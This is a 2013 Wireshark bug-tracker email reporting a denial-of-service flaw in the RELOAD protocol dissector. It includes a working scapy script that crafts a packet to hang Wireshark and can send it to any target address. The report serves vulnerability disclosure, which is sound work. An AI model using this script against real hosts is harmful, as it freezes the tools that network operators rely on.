Wireshark · Wireshark-bugs: [Wireshark-bugs] [Bug 8364] New: Denial of Service in packet-reload.c

Wireshark-bugs: [Wireshark-bugs] [Bug 8364] New: Denial of Service in packet-reload.c

Date: Thu, 21 Feb 2013 01:07:16 +0000

Bug ID	8364
Summary	Denial of Service in packet-reload.c
Classification	Unclassified
Product	Wireshark
Version	1.8.5
Hardware	All
OS	All
Status	UNCONFIRMED
Severity	Major
Priority	Low
Component	Dissection engine (libwireshark)
Assignee	[email protected]
Reporter	[email protected]

Created attachment 10062 [details]
Pcap that will hang wireshark

Build Information:

--
A maliciously crafted packet can cause a denial of service condition by
triggering a bug in packet-reload.c on line 3008. The bug is in the while loop
condition. It can be made to always evaluate to true. The while loop takes the
form of
 while(guint16<guint32){/*...*/} 
where both integers are taken from the packet. A specially crafted packet can
force Wireshark to hang indefinitely. The dissector is applied heuristically so
no user interaction is required to trigger the bug. 


Steps to reproduce:
  Use the python/scapy script to generate a packet or open the attached pcap
and try to view in wireshark or tshark.
Expected Results
  pretty pictures of packet internals, business as usual. 
Actual Results:
  Dissector loops forever. Wireshark/tshark becomes unresponsive.


##################################
#Python script to generate packet#
##################################

from scapy.all import *
from struct import pack
import sys

#0_ dissect_diagnosticrequest
#1_ dissect_pathtrackreq
#2_ dissect_reload_messagecontents
#3_ dissect_reload_message
#4_ dissector_try_heuristic

m='This message is brought to you by Evan Jensen AKA wont'
header='d2454c4f'.decode('hex')
switch_at_3438 = pack('>H',101)
message_size=pack('>I',38)
must_be_greater_than_zero = pack('>I',1)
choke_on_this='\x01'*(2**10)
data="" + m[:12] +message_size+m[12:24]+'\x00'*6 + \
    switch_at_3438 + must_be_greater_than_zero + '\x00'*9\
    + 'wont'*5 + choke_on_this


if len(sys.argv)<2:
    packet=Ether()/IP(dst="127.0.0.1")/TCP(dport=8090,sport=5070)/Raw(data)
    wrpcap('reload.c.crash.pcap',[packet])

elif ':' in sys.argv[1]:
    packet=IPv6(dst=sys.argv[1])/TCP(dport=8090,sport=5070)/Raw(data)
    send(packet)

else:
    packet=IP(dst=sys.argv[1])/TCP(dport=8090,sport=5070)/Raw(data)
    send(packet)

You are receiving this mail because:

You are watching all bug changes.

Follow-Ups:
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon
- [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
  - From: bugzilla-daemon

Prev by Date: [Wireshark-bugs] [Bug 8357] Lua __tostring() metamethod of FieldInfo can cause error
Next by Date: [Wireshark-bugs] [Bug 8362] Checksum calculation is wrong for some IPv6 packets
Previous by thread: [Wireshark-bugs] [Bug 8363] graph analysis - part of the graph freezes while scrolling
Next by thread: [Wireshark-bugs] [Bug 8364] Denial of Service in packet-reload.c
Index(es):
- Date
- Thread